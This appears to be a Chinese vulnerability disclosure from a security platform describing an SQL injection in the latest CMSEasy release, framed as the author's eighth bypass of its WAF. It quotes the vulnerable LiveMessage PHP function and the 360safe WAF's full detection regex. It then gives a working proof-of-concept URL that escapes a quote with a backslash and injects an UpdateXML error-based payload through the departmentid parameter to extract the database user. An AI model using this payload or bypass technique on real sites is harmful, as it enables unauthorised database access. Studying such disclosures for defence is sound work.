cmseasy 最新版SQLl注入（第八次绕WAF）

### 简要描述： 继续绕啊绕啊 ### 详细说明： cmseasy 终于更新了 看了下对比文件，那修复~~~无法吐槽~~~~ ``` function LiveMessage($a) { global $db; $sessionid = $_SESSION['sessionid']; $name = addslashes(htmlspecialchars($a['name'])); $email = addslashes(htmlspecialchars($a['email'])); $country = htmlspecialchars($a['country']); $phone = htmlspecialchars($a['phone']); $departmentid = htmlspecialchars($a['departmentid']); $message = htmlspecialchars($a['message']); $timestamp = time(); $ip = $_SERVER['REMOTE_ADDR']; $sql = "INSERT INTO `chat` (`sessionid`,`name`,`email`,`phone`,`departmentid`,`message`,`timestamp`,`ip`,`status`) VALUES('" . $sessionid . "','" . $name . "','" . $email . "','" . $phone . "','" . $departmentid . "','" . $message . "','" . $timestamp . "','" . $ip . "','2')"; $db->query($sql); $sql = "DELETE FROM `sessions` WHERE `id`='" . $sessionid . "'"; $db->query($sql); $text = "<?php echo $lang[shout_success]?>\n"; $objResponse = new xajaxResponse('utf-8'); $objResponse->addAssign('content', 'innerHTML', $text); $objResponse->redirect('../', 5); return $objResponse; } ``` $a是可以通过前端get或者post传入。 只修复了name和email，不修复下面几个变量 这是给我们留着漏洞挖么！！！！！！！ 然后开始测试，擦 发现360safe被更新了，修复增加了检测单引号！ 这不坑爹么，只要输入单引号全盘否定！ ``` $getfilter = "\\<.+javascript:window\\[.{1}\\\\x|<.*=(&#\\d+?;?)+?>|<.*(data|src)=data:text\\/html.*>|\\b(alert\\(|confirm\\(|expression\\(|prompt\\(|benchmark\s*?\(.*\)|sleep\s*?\(.*\)|load_file\s*?\\()|<[a-z]+?\\b[^>]*?\\bon([a-z]{4,})\s*?=|^\\+\\/v(8|9)|\\b(and|or)\\b\\s*?([\\(\\)'\"\\d]+?=[\\(\\)'\"\\d]+?|[\\(\\)'\"a-zA-Z]+?=[\\(\\)'\"a-zA-Z]+?|>|<|\s+?[\\w]+?\\s+?\\bin\\b\\s*?\(|\\blike\\b\\s+?[\"'])|\\/\\*.*\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT(\\(.+\\)|\\s+?.+?|`.*?`)|UPDATE(\\(.+\\)|\\s+?.+?|`.*?`.*?)SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE)(\\(.+\\)|\\s+?.+?\\s+?|`.*?`.*?)FROM(\\(.+\\)|\\s+?.+?|`.*?`.*?)|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)|\\/\\*.*?\\*\\/|'"; ``` 但是还可以用转义符，接下来就是开始绕啊绕啊： POC: http://192.168.152.160:8080/cmseasy/celive/live/header.php?xajax=LiveMessage&xajaxargs[0][phone]=\&xajaxargs[0][departmentid]=,(UpdateXML(1,CONCAT(0x5b,user(),0x5d),1)),6,7,8)%23 另外官网没测试成功，好像有安全狗 [<img src="https://images.seebug.org/upload/201410/2116050066f944837bd72c49ed6256f9fc062475.png" alt="BaiduHi_2014-10-21_16-4-7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/2116050066f944837bd72c49ed6256f9fc062475.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201410/2116050066f944837bd72c49ed6256f9fc062475.png" alt="BaiduHi_2014-10-21_16-4-7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/2116050066f944837bd72c49ed6256f9fc062475.png)